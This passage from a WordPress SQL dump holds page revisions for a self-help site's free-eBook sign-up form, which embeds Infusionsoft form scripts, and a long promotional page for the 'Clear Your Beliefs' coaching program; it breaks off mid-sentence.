(1938, 2, '2014-12-04 19:49:53', '2014-12-05 00:49:53', '<h1 style="text-align: center;">Here''s how to get your free eBook,\r\n"Clear Your Beliefs."</h1>\r\n\r\n\r\n<p><center><img src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="202" height="300" class="aligncenter size-medium wp-image-1476" /></center></p>\r\n\r\n\r\n[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\r\n\r\n<div style="margin-left: -15px; margin-bottom: 0px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/ec4d25c4ea7e88210ce7b8c897c925d5"></script></div>\r\n</center> [/su_box]\r\n\r\n\r\n', 'ebook', '', 'inherit', 'closed', 'open', '', '1720-revision-v1', '', '', '2014-12-04 19:49:53', '2014-12-05 00:49:53', '', 1720, 'http://clearyourbeliefs.com/1720-revision-v1', 0, 'revision', '', 0),
(1934, 2, '2014-12-04 19:45:15', '2014-12-05 00:45:15', '<h1 style="text-align: center;">Here''s how to get your free eBook,\r\n"Clear Your Beliefs."</h1>\r\n\r\n\r\n<p><center><img src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="202" height="300" class="aligncenter size-medium wp-image-1476" /></center></p>\r\n\r\n\r\n[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\r\n<center style="margin-top: -25px; margin-bottom: -30px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="306" /></center>\r\n<p style="text-align: center; padding-top:10px; margin: 0px;"><strong>Download the free eBook.</strong></p>\r\n\r\n<div style="margin-left: -15px; margin-bottom: 0px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/54657fac17ff5d88bb7ea5db95ab4742"></script></div>\r\n</center> [/su_box]\r\n\r\n\r\n', 'ebook', '', 'inherit', 'closed', 'open', '', '1720-revision-v1', '', '', '2014-12-04 19:45:15', '2014-12-05 00:45:15', '', 1720, 'http://clearyourbeliefs.com/1720-revision-v1', 0, 'revision', '', 0),
(1935, 2, '2014-12-04 19:45:37', '2014-12-05 00:45:37', '<h1 style="text-align: center;">Here''s how to get your free eBook,\r\n"Clear Your Beliefs."</h1>\r\n\r\n\r\n<p><center><img src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="202" height="300" class="aligncenter size-medium wp-image-1476" /></center></p>\r\n\r\n\r\n[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\r\n<center style="margin-top: -25px; margin-bottom: -30px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="606" /></center>\r\n<p style="text-align: center; padding-top:10px; margin: 0px;"><strong>Download the free eBook.</strong></p>\r\n\r\n<div style="margin-left: -15px; margin-bottom: 0px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/54657fac17ff5d88bb7ea5db95ab4742"></script></div>\r\n</center> [/su_box]\r\n\r\n\r\n', 'ebook', '', 'inherit', 'closed', 'open', '', '1720-revision-v1', '', '', '2014-12-04 19:45:37', '2014-12-05 00:45:37', '', 1720, 'http://clearyourbeliefs.com/1720-revision-v1', 0, 'revision', '', 0),
(1936, 2, '2014-12-04 19:46:00', '2014-12-05 00:46:00', '<h1 style="text-align: center;">Here''s how to get your free eBook,\r\n"Clear Your Beliefs."</h1>\r\n\r\n\r\n<p><center><img src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="202" height="300" class="aligncenter size-medium wp-image-1476" /></center></p>\r\n\r\n\r\n[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\r\n<center style="margin-top: -25px; margin-bottom: -30px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="1606" /></center>\r\n<p style="text-align: center; padding-top:10px; margin: 0px;"><strong>Download the free eBook.</strong></p>\r\n\r\n<div style="margin-left: -15px; margin-bottom: 0px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/54657fac17ff5d88bb7ea5db95ab4742"></script></div>\r\n</center> [/su_box]\r\n\r\n\r\n', 'ebook', '', 'inherit', 'closed', 'open', '', '1720-revision-v1', '', '', '2014-12-04 19:46:00', '2014-12-05 00:46:00', '', 1720, 'http://clearyourbeliefs.com/1720-revision-v1', 0, 'revision', '', 0),
(1937, 2, '2014-12-04 19:49:05', '2014-12-05 00:49:05', '<h1 style="text-align: center;">Here''s how to get your free eBook,\r\n"Clear Your Beliefs."</h1>\r\n\r\n\r\n<p><center><img src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="202" height="300" class="aligncenter size-medium wp-image-1476" /></center></p>\r\n\r\n\r\n[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\r\n<center style="margin-top: -25px; margin-bottom: -30px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="1606" /></center>\r\n<p style="text-align: center; padding-top:10px; margin: 0px;"><strong>Download the free eBook.</strong></p>\r\n\r\n<div style="margin-left: -15px; margin-bottom: 0px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/ec4d25c4ea7e88210ce7b8c897c925d5"></script></div>\r\n</center> [/su_box]\r\n\r\n\r\n', 'ebook', '', 'inherit', 'closed', 'open', '', '1720-revision-v1', '', '', '2014-12-04 19:49:05', '2014-12-05 00:49:05', '', 1720, 'http://clearyourbeliefs.com/1720-revision-v1', 0, 'revision', '', 0),
(2033, 2, '2014-12-12 17:20:27', '2014-12-12 22:20:27', '<p class="infusion-form"><input name="inf_form_xid" type="hidden" value="fce61116f5a9a85d3022cf39699950ce" /></p>\r\n\r\n<h1 class="infusion-form"><input name="inf_form_name" type="hidden" value="CYB Newsletter Sign Up" />         Get Lion''s free eBook, <em>Clear Your Beliefs!</em></h1>\r\n<p style="margin-left: -15px;><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook-201x300.png" alt="Clear-your-beliefs-ebook" width="150" height="225" class="alignleft size-medium wp-image-1893" /></a>We would be delighted to send you a free copy of Lion’s multimedia eBook, <em>“Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life"</em>.</p>\r\n\r\nThis multimedia book describes the science and the art of the <em>Clear Your Beliefs</em> process. It offers an explanation for why you do what you do, and why it’s so difficult to change your habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs.\r\n\r\nYou’ll get an email to confirm your address, then you''ll get immediate access to the downloadable book.\r\n\r\nYou will also receive Lion’s periodic newsletter about beliefs, belief-change, and transformation.\r\n\r\nIf we can ever provide you with answers to your questions, guidance on your path, or good, deep conversation about these topics, please contact us through <a href="http://www.clearyourbeliefs.com/support" target="_blank">www.ClearYourBeliefs.com/support.</a>  We look forward to staying connected.\r\n\r\n[Note: Your contact information will never be shared, and you can un-subscribe anytime.]\r\n\r\n\r\n[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\r\n\r\n<div style="margin-left: -15px; margin-bottom: 0px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/ec4d25c4ea7e88210ce7b8c897c925d5"></script></div>\r\n</center> [/su_box]\r\n\r\n\r\n', 'ebook', '', 'inherit', 'closed', 'open', '', '1720-revision-v1', '', '', '2014-12-12 17:20:27', '2014-12-12 22:20:27', '', 1720, 'http://clearyourbeliefs.com/1720-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(1941, 4194, '2014-12-10 20:27:39', '2014-12-11 01:27:39', '&nbsp;\r\n<div class="embed-container">                           <iframe src="//player.vimeo.com/video/129244809?autoplay=0" width="300" height="150" frameborder="0" allowfullscreen="allowfullscreen"></iframe></div>\r\n<div class="quot" style="text-align: center; margin: 0px auto ! important;"><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /><span style="color: #ff0000;">.</span>\r\n<span style="color: #ff0000;"><strong>Your <em>limitations</em> are created by your <em>beliefs</em>.\r\nChange your beliefs, and those limitations disappear.\r\nYour possibilities become unlimited\r\n.</strong></span>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>\r\n<h1 class="clear" style="text-align: center;"><strong><span style="font-size: 24px;">The </span>Clear Your Beliefs<span style="font-size: 24px;"> </span>Coaching Program</strong> <span style="font-size: 24px; text-align: center;">is Custom-designed for YOU and Your Life</span></h1>\r\n<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\r\n<ul style="margin-left: 25px;">\r\n 	<li><span style="color: #000080;">Release pain, hurt and trauma from the past</span></li>\r\n 	<li>Open yourself to deeper, more profound love</li>\r\n 	<li><span style="color: #000080;">Recognize your True Self – your spiritual nature</span></li>\r\n 	<li>Become less reactive and more peaceful</li>\r\n 	<li><span style="color: #000080;">Discover the Source of your personal power</span></li>\r\n 	<li>Open yourself to new possibilities and success</li>\r\n 	<li><span style="color: #000080;">Eliminate blocks and barriers – simply and easily</span></li>\r\n 	<li>Discover your true life purpose and manifest it</li>\r\n 	<li><span style="color: #000080;">Express your true magnificence in the world</span></li>\r\n</ul>\r\n<h2>Why This Coaching Program Creates Miracles</h2>\r\n<ul style="margin-left: 26px;">\r\n 	<li><em><strong>Your beliefs</strong></em><strong> are the foundational structure at the core of your subconscious mind.  </strong>Like a computer operating system, they determine most of what you experience, and shape what you CAN experience. Your beliefs are the source of your joy or misery, happiness or depression, ease and flow or resistance, healthy relationships or repeated upsets, a flow of abundance or limitations in your life.</li>\r\n 	<li><strong>The <em>Clear Your Beliefs Coaching Program</em></strong> <strong>is custom designed for YOU</strong> and your unique personal needs. We will guide you through the process of eliminating negative and limiting beliefs,  and reprogramming your Human Operating System.</li>\r\n 	<li>Using proprietary processes and techniques, we work with all three levels of your mind: 1) the Subconscious, 2) the Conscious, aware self, and 3) the Superconscious Mind, or Higher Self. When you change all three aspects at once, you feel different immediately. Internal resistance melts away like magic. Old patterns are simply gone – and they don''t return.</li>\r\n 	<li><strong>You are empowered at every step.</strong>  We show you how to determine what you want and how to get it. We help you reprogram your inner landscape, where beliefs and inner voices live. Unlike hypnosis and other belief-change techniques, we don''t tell you what to believe, or what''s good for you. You remain in control of the process at all times, and over time, you learn to do the process on your own.</li>\r\n 	<li><strong>Unlike other methodologies, the changes you make are permanent</strong> – your old beliefs and patterns don''t return. You become truly free to create the life you want.  You are truly empowered as the source of your own creation.</li>\r\n 	<li>Every step of the way, you are gently guided by a Certified Clear Beliefs Coach.  <strong>The initial 9-session protocol is guaranteed to produce results – or your money back. </strong></li>\r\n</ul>\r\n</div>\r\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a>You''re seeking a better life. You''ve been on the path of personal growth for some time. You''ve tried many methods and teachers. You''ve had some breakthrough experiences and epiphanies. <strong>You''ve made progress toward your goals...</strong>\r\n\r\n<strong>Yet you continue to fall back into old habits and patterns. </strong>In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.\r\n<h1>What If You Could Permanently Delete Old Habits And Patterns – So They <em>Didn''t</em> Come Back?</h1>\r\n<strong>There are hundreds of teachers and organizations offering the next miracle cure for what they believe ails you. </strong>They promise to improve some area of your life or business. Yet their "fixes" tend to wear off over time. After you spend your money and do the work, you feel revved up,  and ready to create your new life. However ...\r\n\r\n<strong>Two weeks later, you find yourself doing most of the same things in the same way you were doing before.</strong> Your old issues return to haunt you once again. Nothing significant seems to have changed. You''re not taking the consistent actions required to reach your goals or change your life.  You may think that there must be something wrong with you.\r\n<h1>Why Does This Happen?</h1>\r\n<img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /><span style="color: #000000;"><strong>Most efforts to create internal change are "outside-in" approaches.</strong> You try new habits, or thoughts. You say affirmations over and over,  or you become accountable and take actions toward your goal. But these effort fail eventually, because the INNER DRIVERS of your thoughts and behavior haven''t changed.</span>\r\n\r\n<span style="color: #000080;"><strong>The real cause behind your habits of mind, negative emotions and reactive behavior are the early programs – the beliefs – that reside deep in the psyche.</strong>  </span><strong>To change them, you need an "inside-out" approach.</strong>\r\n\r\nThere''s a myth that''s says: <em>"It takes 30 days to change a habit?" </em><strong> It''s not true.</strong> Research has shown that you can change some simple habits in 30 days, but significant life changes take <span style="text-decoration: underline;">much</span> more time, effort and practice.\r\n\r\nThe brain''s ability to change over time is called <em>neuroplasticity</em>. It can take months – or <em>years</em> – of hard work to shift old patterns of behavior – especially the deep, core patterns that keep getting in our way. New habits will replace old ones if you apply consistent, steady efforts – <strong>but most people give up long before that happens.</strong>\r\n<h1>To Make Real Change, You''ve Got to Get to the Root</h1>\r\n<span style="color: #000000;"><img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></span>\r\n\r\n<strong>If you cut off a weed at the ground level, it just grows back</strong> – again and again. You have to pull it up by the root in order to permanently get rid of it.\r\n\r\n<strong>The best doctors seek the <em>source</em> of a dis-ease</strong> – they don''t just treat the symptoms.  Symptom-allieving drugs make you feel better for awhile, but the symptoms can come back, because the <em>cause</em> of the problem – where the illness is being generated – hasn''t been healed.\r\n\r\n<span style="color: #000080;"><strong> What is at the root of the habits and patterns in your life that cause you so much unhappiness?</strong></span>\r\n\r\n<center><a class="big button blue" href="http://clearyourbeliefs.com/ebook/" target="_blank" rel="noopener">Register for FREE Ebook</a></center>\r\n<h1>Beliefs Are the Foundational Structure of Your Experience</h1>\r\n<strong>The vast majority of your psychological, emotional, and physical experience is caused by your </strong><em><strong>beliefs.</strong> (The rest is caused by the physical realities of your circumstances, physiology, and </em><i>environmental factors.) </i>\r\n\r\nMost people think of <em>beliefs</em> as consciously held convictions – but <strong>our most deeply held and tenacious beliefs are unconscious.</strong> They operate <em>through us. </em>They create the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all, until they suddenly manifest in our lives.\r\n\r\n<em><strong>Your beliefs are at the core of every experience, decision, and pattern in your life. </strong></em><span style="color: #000080;"><strong>Change your beliefs, and you will change your experiences.</strong></span>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a><span style="color: #000000;">Beliefs are the<em> foundation</em> of your consciousness, upon which your thoughts, feelings, and attitudes are built.</span>\r\n\r\n<span style="color: #000000;"><strong>You literally <span style="text-decoration: underline;">create your reality</span> with your beliefs.</strong></span>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a unstable ground, it doesn''t matter how much redecorating you do. The house will eventually buckle and collapse.\r\n\r\nEven if you fervently practice meditation, visualization, or business building skills, sneaky saboteurs in the basement of your mind will pull the foundation out from under you. Success and happiness will elude you. Your life dreams will collapse.\r\n<h1>Upgrade Your Human Operating System</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.\r\n\r\nNegative beliefs operate like a badly programmed operating system, messing up everything in your life, preventing you from doing what you came here to do.\r\n\r\n<strong>Do you ever have thoughts like these?</strong>\r\n<div class="icon_box bullets">\r\n<ul class="two-col">\r\n 	<li><strong><em>I''m not enough.</em></strong></li>\r\n 	<li><strong><em>I can''t do it.</em></strong></li>\r\n 	<li><strong><em>I''m not worthy.</em></strong></li>\r\n 	<li><strong><strong><em>I''ll never be like them.</em></strong></strong></li>\r\n 	<li><strong><em>I''m all alone.</em></strong></li>\r\n</ul>\r\n<ul class="two-col rt">\r\n 	<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\r\n 	<li><strong><em>There''s something wrong with me.</em></strong></li>\r\n 	<li><strong><em>I''m fundamentally flawed.</em></strong></li>\r\n 	<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\r\n 	<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\r\n</ul>\r\n</div>\r\nThese beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.\r\n\r\nAt the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background – like an annoying little machine that you can''t turn off.\r\n\r\n<strong>Here''s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep it resides in the subconscious mind, can be pulled up for examination, and changed. Simply and easily.</span></strong>\r\n<h1>The Garden Of Your Mind</h1>\r\n<p style="text-align: left;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\r\nThe same thing is true in your subconscious mind:\r\n\r\n<strong>First, clear your old beliefs out of the way. THEN, when you install new, empowering beliefs, they will grow and flourish in your life.</strong>\r\n\r\n<strong>It''s that simple.</strong>\r\n<h1>Beliefs Reside In The Subconscious Mind</h1>\r\n<div class="parg-text">\r\n<p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\r\n<p style="text-align: left;"><img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />To pull old beliefs out by the root, you need an effective method that can dive down into the core of your psyche – your subconscious mind – deeper than words can go, deeper than talk therapy can go, deeper than new ideas, new behaviors, or a weekend workshop.</p>\r\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life is different.</strong>\r\n<div class="parg-text">\r\n\r\nA shift at the core of the psyche has a palpable <em>feel </em>immediately. It expands outward into your life like ripples in a still pond. It moves outward easily, and effortlessly. <strong>The new belief you chose simply manifests – without resistance or struggle – without the need for repetition or continued processing.</strong>\r\n<p style="text-align: center;"><span style="color: #ff0000;"><strong>Learn  about our Coaching Program Here</strong></span></p>\r\n\r\n</div>\r\n<h1>Beliefs Are The Lens You See The World Through</h1>\r\n<div class="parg-text">\r\n\r\n<strong><em>How you see yourself, and what you think about yoursel</em><em>f,</em> is determined by your core beliefs </strong>– the ones indoctrinated into you by your parents, family members, and caregivers when you were a child.\r\n<div class="parg-text">\r\n\r\n<em>How you view, interact with, and react to others </em>is colored by the beliefs about "others" you absorbed and learned at a young age.\r\n<div class="parg-text">\r\n\r\n<img class=" wp-image-322 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" /><strong><em>Your experience of the world</em></strong> <strong>is shaped, colored, and distorted by your beliefs. </strong>The opportunities you see for yourself in the world are limited by your beliefs about what is possible for you. That''s why beliefs are often referred to as <i>limiting beliefs – </i>because they limit your possibilities.\r\n\r\n<em><strong>Throughout your life, your experiences have been shaped by the beliefs you accumulated since your birth.  (And even before your birth...)</strong></em>\r\n<div class="parg-text">\r\n\r\nWhen you change the lens of your beliefs, you change <strong>both</strong> your perceptions <strong><span style="text-decoration: underline;">and</span></strong> your experiences. <span style="color: #000080;"><strong>Change your beliefs, and your circumstances and your possibilities also change.</strong></span>\r\n<div class="parg-text">\r\n\r\n<span style="color: #000000;"><strong> It''s that simple. Except...</strong></span>\r\n\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<h1>Why Beliefs Are Difficult To Change</h1>\r\n<div class="parg-text">\r\n\r\nMany people say, <em>"Your beliefs create your reality." </em>Many people will tell you to "<em>Just change your beliefs!</em>"  But it''s not that easy.  You need specific tools that change your beliefs <em>permanently</em>.  <strong>Beliefs </strong><strong>reside in your subconscious mind, below the level of your conscious awareness, so you need tools that make changes at that depth – in the subconscious. </strong>\r\n\r\n</div>\r\n<div class="parg-text">\r\n\r\n<strong>When you were an infant, before you could speak, your parents and caregivers began the process of your indoctrination.</strong> Those indoctrinated beliefs are still buried deep in your pre-verbal (or <em>implicit</em>) memory. Most methods can''t reach down into that level.\r\n\r\n</div>\r\n<div class="parg-text">\r\n\r\n<strong>Those folks indoctrinated you for a good reason: they wanted you to survive and thrive.</strong> Since their beliefs allowed <em>them</em> to survive,  they wanted <em>you</em> to have the same beliefs. They thought you needed them.  They never questioned whether they were a good fit for you. They didn''t know any better.  It''s what <em>their parents</em> did to<em> them</em>.\r\n\r\n</div>\r\n<div class="parg-text">\r\n\r\n<strong>You accepted this early programming eagerly,</strong> because you wanted to be <em>like </em>your parents, so they would <em>like you. </em> This is a survival mechanism inside of all animals.  The more you are like your parents, the less likely they are to abandon you,  reject you, or leave you out for the wolves.\r\n\r\n<strong>When you got older, you began to question some of those beliefs, and you decided to believe other things instead. </strong>However, your first beliefs remained in your subconscious, playing havoc with your life.  The ones you <em>didn''t question</em> became "That''s what''s true about me. That''s just how the world is."\r\n\r\n<strong>Take this opportunity to <em>question</em> <i>all of your beliefs, get rid of the ones that aren''t working for you, </i>and <em>choose new ones consciously.</em></strong>  What you choose will determine your experience from this moment forward.\r\n\r\n</div>\r\n<h1>Why You React The Way You Do</h1>\r\n<div class="parg-text">\r\n\r\nWhen you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself:\r\n\r\n</div>\r\n<div class="parg-text">\r\n\r\n<img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" />\r\n\r\n</div>\r\n<ul>\r\n 	<li>Why did I say that?</li>\r\n 	<li>Why did I do that?</li>\r\n 	<li>What''s wrong with me?</li>\r\n 	<li>Why didn''t I choose love?</li>\r\n 	<li>What caused me to react?</li>\r\n 	<li>What the hell just happened?</li>\r\n</ul>\r\n<strong><em>Sudden Reaction Syndrome</em></strong> can be traced back to the beliefs and experiences buried deep in your subconscious mind. When your early childhood wounds get triggered, old patterns of response jump up and hijack your logical, adult mind. You can''t help it.\r\n<div class="parg-text">\r\n\r\nThese programs are like mousetraps in your mind''s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. You react in a way that feels suddenly out of conscious control.\r\n\r\n</div>\r\n<div class="parg-text">\r\n\r\n<strong>You can change these reactive patterns – if you''re willing to clean out your basement, where your old wounds and traumas from your childhood live.</strong>\r\n\r\n</div>\r\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\r\n<div class="parg-text">\r\n\r\n<strong>Here''s a test for any method of changing beliefs: Did the problem go away completely? Did it stay away? Or did it return?</strong>\r\n\r\n</div>\r\n<div class="parg-text">\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people some of the time. If a method creates permanent change, it''s a good methodology for you. But most methods create only temporary relief. The old beliefs or problems return, causing the same problem to appear over and over again.\r\n\r\n</div>\r\n<strong>Here''s why other methods don''t work very well:</strong>\r\n<ul class="indented">\r\n 	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you decide to install. You say them over and over, all day long, but they don''t change anything at the subconscious level. Repeating affirmative statements is like stomping on a weed, hoping they die.  It makes you feel better for awhile, but those good feelings fade quickly – because the earlier beliefs haven''t been eliminated. So you''re constantly fighting against yourself.</li>\r\n 	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn''t true anymore. For example, Byron Katie''s <em>The Work</em> helps you wake up to the impact the belief has had in your life, and you can see that it''s false at the conscious level. But this realization doesn''t clear the belief at the causal level, where beliefs are stored, in the subconscious mind.</li>\r\n 	<li><span style="color: #333399;"><strong>Tap Your Problem Away.</strong></span>  Some belief-change techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They help to remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed up (like an acupuncture treatment), and you can move forward. But too often, you re-meet those same negative beliefs further down the road.</li>\r\n</ul>\r\n<div class="parg-text">\r\n\r\nIf your old beliefs pop back up later, the process didn''t create permanent change. <strong>The problem isn''t you! The problem is with the method – it was only partially effective!</strong>\r\n\r\n</div>\r\n<h1>Here''s Some Good News</h1>\r\n<ul class="indented">\r\n 	<li><strong><strong><strong><span style="color: #000080;">First:</span> It''s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\r\n 	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\r\n</ul>\r\n<div class="parg-text">\r\n\r\nTo get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they''ll pop up later and re-create the same problem – over and over again.\r\n\r\n</div>\r\n<div class="parg-text">\r\n\r\n<strong>Learn to </strong><strong style="font-style: italic;">Clear Your Beliefs </strong><strong>permanently </strong>with the <em>Clear Beliefs Coaching Program.</em>\r\n\r\n</div>\r\n<h1>Imagine Living the Life You Truly Desire</h1>\r\n<div class="parg-text">\r\n\r\n<strong>Can you imagine this?</strong>\r\n\r\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\r\n\r\nYou''re no longer held back by old beliefs and stories.\r\n\r\nThere''s no resistance to doing what needs to be done.\r\n\r\nYou feel joy and positive energy as you move forward to create the life of your dreams.\r\n<h1>Begin With A Mind Makeover</h1>\r\n<div class="parg-text">\r\n\r\n<strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong>\r\n<div class="parg-text">\r\n\r\n<img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em>\r\n<div class="parg-text">\r\n\r\nThose discouraging words can stop you from moving forward. They WILL come up – it''s inevitable. It''s how beliefs work. So you need a way to clear those negative voices.\r\n<div class="parg-text">\r\n\r\n<strong><em>Clear Your Beliefs Coaching</em> is a unique approach to solving this dilemma. The process changes your beliefs at the core of the psyche, so they never return.</strong>\r\n<h1>Clear Whatever Is In The Way</h1>\r\n<div class="parg-text">\r\n\r\n<img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don''t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.\r\n<div class="parg-text">\r\n\r\n<strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don''t</em> want.</strong>\r\n\r\n</div>\r\n<h1>Is This A Guaranteed Cure-All?</h1>\r\n<div class="parg-text">\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.\r\n<div class="parg-text">\r\n\r\nNo technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.\r\n<div class="parg-text">\r\n\r\nDuring the past fifteen years, thousands of our clients have cleared almost every type of problem and issue known. When you place your attention on the source, at the causal level, down where your beliefs 